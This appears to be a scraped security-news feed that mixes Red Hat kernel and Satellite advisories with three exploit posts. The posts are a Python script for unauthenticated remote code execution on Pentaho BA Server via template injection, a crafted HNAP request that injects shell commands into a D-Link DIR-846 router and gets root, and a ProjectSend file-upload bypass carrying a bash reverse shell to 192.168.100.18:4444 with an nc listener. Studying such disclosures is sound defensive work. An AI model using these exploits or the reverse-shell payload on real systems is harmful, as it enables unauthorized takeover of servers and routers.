Pentaho BA Server EE version 9.3.0.0-428 suffers from a remote code execution vulnerability via a server-side template injection flaw.

**Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution**

    # Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)# Author: dwbzn# Date: 2022-04-04# Vendor: https://www.hitachivantara.com/# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html# Version: Pentaho BA Server 9.3.0.0-428# CVE: CVE-2022-43769, CVE-2022-43939# Tested on: Windows 11# Credits: https://research.aurainfosec.io/pentest/pentah0wnage# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)import requestsimport argparseparser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)args = parser.parse_args()url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"print ("running...")r = requests.get(url)if r.text == 'false':    print ("command should've executed! nice.")else:    print ("didn't work. sadge...")

Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution

Red Hat Security Advisory 2023-1662-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1662-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1662  
Issue date:        2023-04-05  
CVE Names:         CVE-2023-0266 CVE-2023-0461   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
kpatch-patch-4_18_0-305_65_1-1-5.el8_4.src.rpm  
kpatch-patch-4_18_0-305_71_1-1-4.el8_4.src.rpm  
kpatch-patch-4_18_0-305_72_1-1-3.el8_4.src.rpm  
kpatch-patch-4_18_0-305_76_1-1-2.el8_4.src.rpm  
kpatch-patch-4_18_0-305_82_1-1-1.el8_4.src.rpm

ppc64le:  
kpatch-patch-4_18_0-305_65_1-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_65_1-debuginfo-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_65_1-debugsource-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-1.el8_4.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-305_65_1-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-debuginfo-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-debugsource-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debuginfo-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_82_1-debugsource-1-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC2QfNzjgjWX9erEAQjDDg//eEgJoqhJcHFm5gO0BE3zMQaoc9+bVd5a  
GrZ9j9cpJlpywY8uLTfBCA4pbEKgZEitEY5FMSTwdPjYviOsE5rd7byww9ualHtG  
FDlERdRhnulIfq7wAS0Lb//sCyqNw6rsVE2dTNXxuNLqDCgsZjKBq8S+XF+Ag2wJ  
pBvOYW3a4abK3vbV7beH+syXD39NCJ1m6bhTvLbdxfJHgMjyquz8IeIcVL43rhtq  
nXUce/YJKU2Roz0Iz+NUMEPfXfBny5/jfV+ChMO8Ga/joc1HQPdLSgc42J85tTmv  
m8BIL+iHiVendKY4E5DwTB49ae8CTDIcqPtzY6EVCxwbq0kxHhKsA2Ud+z+ziBQe  
l7p+19eM3OBveLmeHgVOziBUQhVmy2joiWU6iaYYrcon/S8BOKQZQ3AeAAaY5niF  
npBv9or4FbfTWjVDb8R8t3AQSqy54ssmvNjfXeih2QGV9ewyn8JS8Lw3/YOmV5Zu  
1knYj3k+Lvc8GSuZuL2a/yLTyG4J+DwVAaZQpJJzKhZxyEx1tUCCw9VIBakXc9VQ  
j8hpx8GfbShhD+oJGQkUyffmE2Y03+FnsQzNfByjoThnC/rtEvfLk4VSpHZ0qjs6  
F9vNoKhA93+GR0L3h5u6ZMDGEA+NbmmwTMrrBV+fLcMkYGJZDzCKNuRG0jZTL/CF  
S5Hii87MsGw=  
=tQuy  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1662-01

D-Link DIR-846 suffers from a remote command execution vulnerability.

    # Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability # Google Dork: NA# Date: 30/01/2023# Exploit Author: Françoa Taffarel# Vendor Homepage:https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Software Link:https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip# Version: DIR846enFW100A53DBR-Retail# Tested on: D-LINK DIR-846# CVE : CVE-2022-46552D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remotecommand execution (RCE) vulnerability via the lan(0)_dhcps_staticlistparameter. This vulnerability is exploited via a crafted POST request.### Malicious POST Request```POST /HNAP1/ HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/jsonSOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285Content-Length: 171Origin: http://192.168.0.1Connection: closeReferer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}```### Response```HTTP/1.1 200 OKX-Powered-By: PHP/7.1.9Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-type: text/html; charset=UTF-8Connection: closeDate: Thu, 01 Dec 2022 11:03:54 GMTServer: lighttpd/1.4.35Content-Length: 68{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}```### Data from RCE Request```GET /HNAP1/rce_confirmed HTTP/1.1Host: 192.168.0.1User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1Upgrade-Insecure-Requests: 1```### Response```HTTP/1.1 200 OKContent-Type: application/octet-streamAccept-Ranges: bytesContent-Length: 24Connection: closeDate: Thu, 01 Dec 2022 23:24:28 GMTServer: lighttpd/1.4.35uid=0(root) gid=0(root)```

D-Link DIR-846 Remote Command Execution

Red Hat Security Advisory 2023-1659-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1659-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1659  
Issue date:        2023-04-05  
CVE Names:         CVE-2022-4378 CVE-2023-0266 CVE-2023-0386   
                   CVE-2023-1476   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

* kernel: FUSE filesystem low-privileged user privileges escalation  
(CVE-2023-0386)

* kpatch: mm/mremap.c: incomplete fix for CVE-2022-41222 (CVE-2023-1476)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
2159505 - CVE-2023-0386 kernel: FUSE filesystem low-privileged user privileges escalation  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
2176035 - CVE-2023-1476 kpatch: mm/mremap.c: incomplete fix for CVE-2022-41222

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kpatch-patch-4_18_0-425_10_1-1-4.el8_7.src.rpm  
kpatch-patch-4_18_0-425_13_1-1-2.el8_7.src.rpm  
kpatch-patch-4_18_0-425_3_1-1-6.el8.src.rpm

ppc64le:  
kpatch-patch-4_18_0-425_10_1-1-4.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_10_1-debuginfo-1-4.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_10_1-debugsource-1-4.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_13_1-1-2.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_13_1-debuginfo-1-2.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_13_1-debugsource-1-2.el8_7.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-1-6.el8.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-debuginfo-1-6.el8.ppc64le.rpm  
kpatch-patch-4_18_0-425_3_1-debugsource-1-6.el8.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-425_10_1-1-4.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_10_1-debuginfo-1-4.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_10_1-debugsource-1-4.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_13_1-1-2.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_13_1-debuginfo-1-2.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_13_1-debugsource-1-2.el8_7.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-1-6.el8.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-debuginfo-1-6.el8.x86_64.rpm  
kpatch-patch-4_18_0-425_3_1-debugsource-1-6.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/cve/CVE-2023-0386  
https://access.redhat.com/security/cve/CVE-2023-1476  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC2Qe9zjgjWX9erEAQhVwA/9F+geRfR34ASgwJojn/TmhjS6mIrUdsy+  
JSeDC5XeDhtilIACCC/GYS2NUApiQiIsQAQ3rlXc1CeAJVLaPoZPtIaDieg7uq9X  
LU9O0RVRUt7gJQAjtRY1zPqS6ZMkMcEnPqF2gMxnlyVaCFFvv81FkRICZsT4BjcK  
5PlbFaUm2hroSR0L5bzQD0HvA6fKR0QkjFr+n5Uq4KLp+PB7cWhXatQYzhsswu7k  
ja7LZbiVeiCzgeWzXrWaDzTygLTRo2nFzeKuxwa6YfwGKaBrL8LN1HorqWr5XLCm  
001eTo1tTQCUhT8G1Sbw+BNZN20o+XdC6naJahAeq76p3vXhHXjbKutPqUgRDpgZ  
KiMu4Wi+pBTolH/MDrRDIeUpqDL9QON9b2sd3M3ZjfQI2GU84CUJJj/Z7Bs9BQzz  
JAskb1stqTom5S5oYX24uL9mKP+2d4WMEaPM1LWzlewKpIBJXryWHryN/LJggxOo  
bN09uK27ll+mTiBL9N+Spk4FlB5ZOOx9s3kcYWqv38sqRLlNNM/UKouDoR0pQd81  
IFKymxdIek5bM7qiySBQDpz4kOiw899KPxc+iC03FOqt8sYMHVz4O0jR97mn0DDO  
rxm6CwbM7/RpoqlNTprkufFsKR3sMZx5ryxIZBhwkejLi87wWkC0miqz8xeqUXkf  
CC9zM26e1Eg=  
=qd3R  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1659-01

projectSend r1605 suffers from a remote code execution vulnerability.

Exploit Title: projectSend r1605 - Remote Code Exectution RCE  
Application: projectSend  
Version: r1605  
Bugs:  rce via file extension manipulation  
Technology: PHP  
Vendor URL: https://www.projectsend.org/  
Software Link: https://www.projectsend.org/  
Date of found: 26-01-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
POC video: https://youtu.be/Ln7KluDfnk4

2. Technical Details & POC  
========================================

1.The attacker first creates a txt file and pastes the following code. Next, the Attacker changes the file extension to jpg. Because the system php,sh,exe etc. It does not allow files. 

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

2.Then the attacker starts listening for ip and port   
 nc -lvp 4444

 3.and when uploading file it makes http request as below.file name should be like this      openme.sh;jpg

POST /includes/upload.process.php HTTP/1.1  
Host: localhost  
Content-Length: 525  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-platform: "Linux"  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0enbZuQQAtahFVjI  
Accept: */*  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/upload.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close

------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="name"

openme.sh;jpg  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunk"

0  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="chunks"

1  
------WebKitFormBoundary0enbZuQQAtahFVjI  
Content-Disposition: form-data; name="file"; filename="blob"  
Content-Type: application/octet-stream

bash -i >& /dev/tcp/192.168.100.18/4444 0>&1

------WebKitFormBoundary0enbZuQQAtahFVjI--

4.In the second request, we do this to the filename section at the bottom.

openme.sh

POST /files-edit.php?ids=34 HTTP/1.1  
Host: localhost  
Content-Length: 1016  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc8btjvyb3An7HcmA  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/files-edit.php?ids=34&type=new  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=jtk7d0nats7nb1r5rjm7a6kj59  
Connection: close

------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="csrf_token"

66540808a4bd64c0f0566e6c20a4bc36c49dfac41172788424c6924b15b18d02  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][id]"

34  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][original]"

openme.sh;.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][file]"

1674759035-52e51cf3f58377b8a687d49b960a58dfc677f0ad-openmesh.jpg  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][name]"

openme.sh  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][description]"

------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="file[1][expiry_date]"

25-02-2023  
------WebKitFormBoundaryc8btjvyb3An7HcmA  
Content-Disposition: form-data; name="save"

------WebKitFormBoundaryc8btjvyb3An7HcmA--

And it doesn't matter who downloads your file. if it opens then reverse shell will be triggered and rce

private youtube video poc : https://youtu.be/Ln7KluDfnk4

projectSend r1605 Remote Code Execution

Red Hat Security Advisory 2023-1630-01 - Red Hat Satellite is a system management solution that allows organizations to configure and maintain their systems without the necessity to provide public Internet access to their servers or other client systems. Issues addressed include an information leakage vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Satellite 6.12.3 Async Security Update  
Advisory ID:       RHSA-2023:1630-01  
Product:           Red Hat Satellite 6  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1630  
Issue date:        2023-04-04  
CVE Names:         CVE-2022-41946   
=====================================================================

1. Summary:

Updated Satellite 6.12 packages that fixes important security bugs and  
several  
regular bugs are now available for Red Hat Satellite.

2. Relevant releases/architectures:

Red Hat Satellite 6.12 for RHEL 8 - noarch

3. Description:

Red Hat Satellite is a system management solution that allows organizations  
to configure and maintain their systems without the necessity to provide  
public Internet access to their servers or other client systems. It  
performs provisioning and configuration management of predefined standard  
operating environments.

Security fix(es):

* Candlepin: PreparedStatement.setText(int, InputStream) will create a  
temporary file if the InputStream is larger than 2k (CVE-2022-41946)

This update fixes the following bugs:

2163538 - Pages Blank  
2174984 - Getting 'null value in column \"image_manifest_id\" violates  
not-null constraint' when syncing openstack container repos  
2174987 - (Regression of 2033940) Error: AttributeError: 'NoneType' object  
has no attribute 'cast' thrown while listing repository versions  
2174994 - VMware Image based Provisioning fails with error- : Could not  
find virtual machine network interface matching <IP>  
2174997 - Package and Errata actions on content hosts selected using the  
"select all hosts" option fails.  
2174998 - Subscription can't be blank, A Pool and its Subscription cannot  
belong to different organizations  
2175002 - Getting "undefined method `schema_version' for nil:NilClass"  
while syncing from quay.io  
2175005 - New kickstart_kernel_options snippet breaks UEFI (Grub2) PXE  
provisioning when boot_mode is static  
2175008 - RHEL 9 as Guest OS is not available on Satellite 6.11   
2174995 - Health check should use hostname -f  
2175007 - [regression] data.yml is referring to old sync plain id which  
does not exist in katello_sync_plans  
2176272 - new wait task introduced by rh_cloud 6.0.44 is not recognized by  
maintain as OK to interrupt  
2175010 - Some custom repositories are failing to synchorize with error  
"This field may not be blank" after upgrading to Red Hat Satellite 6.11  
2176922 - [RFE] Need syncable yum-format repository imports   
2175003  - Can't perform incremental content exports in syncable format 

Users of Red Hat Satellite are advised to upgrade to these updated  
packages, which fix these bugs.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2153399 - CVE-2022-41946 postgresql-jdbc: Information leak of prepared statement data due to insecure temporary file permissions  
2163538 - Pages Blank  
2174984 - Getting 'null value in column \"image_manifest_id\" violates not-null constraint' when syncing openstack container repos  
2174987 - (Regression of 2033940) Error: AttributeError: 'NoneType' object has no attribute 'cast' thrown while listing repository versions  
2174994 - VMware Image based Provisioning fails with error- : Could not find virtual machine network interface matching <IP>  
2174995 - Health check should use hostname -f  
2174997 - Package and Errata actions on content hosts selected using the "select all hosts" option fails.  
2174998 - Subscription can't be blank, A Pool and its Subscription cannot belong to different organizations  
2175002 - Getting "undefined method `schema_version' for nil:NilClass" while syncing from quay.io  
2175003 - Can't perform incremental content exports in syncable format  
2175005 - New kickstart_kernel_options snippet breaks UEFI (Grub2) PXE provisioning when boot_mode is static  
2175007 - [regression] data.yml is referring to old sync plain id which does not exist in katello_sync_plans  
2175008 - RHEL 9 as Guest OS is not available on Satellite 6.11  
2175010 - Some custom repositories are failing to synchorize with error "This field may not be blank" after upgrading to Red Hat Satellite 6.11  
2176272 - new wait task introduced by rh_cloud 6.0.44 is not recognized by maintain as OK to interrupt  
2176922 - [RFE] Need syncable yum-format repository imports

6. Package List:

Red Hat Satellite 6.12 for RHEL 8:

Source:  
candlepin-4.1.20-1.el8sat.src.rpm  
foreman-3.3.0.21-2.el8sat.src.rpm  
python-django-3.2.16-1.el8pc.src.rpm  
python-pulp-container-2.10.12-1.el8pc.src.rpm  
python-pulpcore-3.18.16-1.el8pc.src.rpm  
rubygem-fog-vsphere-3.6.0-1.el8sat.src.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.src.rpm  
rubygem-katello-4.5.0.32-1.el8sat.src.rpm  
rubygem-optimist-3.0.1-1.el8sat.src.rpm  
rubygem-rbvmomi2-3.6.0-2.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
candlepin-4.1.20-1.el8sat.noarch.rpm  
candlepin-selinux-4.1.20-1.el8sat.noarch.rpm  
foreman-3.3.0.21-2.el8sat.noarch.rpm  
foreman-cli-3.3.0.21-2.el8sat.noarch.rpm  
foreman-debug-3.3.0.21-2.el8sat.noarch.rpm  
foreman-dynflow-sidekiq-3.3.0.21-2.el8sat.noarch.rpm  
foreman-ec2-3.3.0.21-2.el8sat.noarch.rpm  
foreman-gce-3.3.0.21-2.el8sat.noarch.rpm  
foreman-journald-3.3.0.21-2.el8sat.noarch.rpm  
foreman-libvirt-3.3.0.21-2.el8sat.noarch.rpm  
foreman-openstack-3.3.0.21-2.el8sat.noarch.rpm  
foreman-ovirt-3.3.0.21-2.el8sat.noarch.rpm  
foreman-postgresql-3.3.0.21-2.el8sat.noarch.rpm  
foreman-service-3.3.0.21-2.el8sat.noarch.rpm  
foreman-telemetry-3.3.0.21-2.el8sat.noarch.rpm  
foreman-vmware-3.3.0.21-2.el8sat.noarch.rpm  
python39-django-3.2.16-1.el8pc.noarch.rpm  
python39-pulp-container-2.10.12-1.el8pc.noarch.rpm  
python39-pulpcore-3.18.16-1.el8pc.noarch.rpm  
rubygem-fog-vsphere-3.6.0-1.el8sat.noarch.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.noarch.rpm  
rubygem-katello-4.5.0.32-1.el8sat.noarch.rpm  
rubygem-optimist-3.0.1-1.el8sat.noarch.rpm  
rubygem-rbvmomi2-3.6.0-2.el8sat.noarch.rpm  
satellite-6.12.3-1.el8sat.noarch.rpm  
satellite-cli-6.12.3-1.el8sat.noarch.rpm  
satellite-common-6.12.3-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
foreman-3.3.0.21-2.el8sat.src.rpm  
python-django-3.2.16-1.el8pc.src.rpm  
python-pulp-container-2.10.12-1.el8pc.src.rpm  
python-pulpcore-3.18.16-1.el8pc.src.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
foreman-debug-3.3.0.21-2.el8sat.noarch.rpm  
python39-django-3.2.16-1.el8pc.noarch.rpm  
python39-pulp-container-2.10.12-1.el8pc.noarch.rpm  
python39-pulpcore-3.18.16-1.el8pc.noarch.rpm  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm  
satellite-capsule-6.12.3-1.el8sat.noarch.rpm  
satellite-common-6.12.3-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
rubygem-foreman_maintain-1.1.12-1.el8sat.src.rpm

noarch:  
rubygem-foreman_maintain-1.1.12-1.el8sat.noarch.rpm

Red Hat Satellite 6.12 for RHEL 8:

Source:  
foreman-3.3.0.21-2.el8sat.src.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.src.rpm  
satellite-6.12.3-1.el8sat.src.rpm

noarch:  
foreman-cli-3.3.0.21-2.el8sat.noarch.rpm  
rubygem-hammer_cli_katello-1.6.0.2-1.el8sat.noarch.rpm  
satellite-cli-6.12.3-1.el8sat.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41946  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
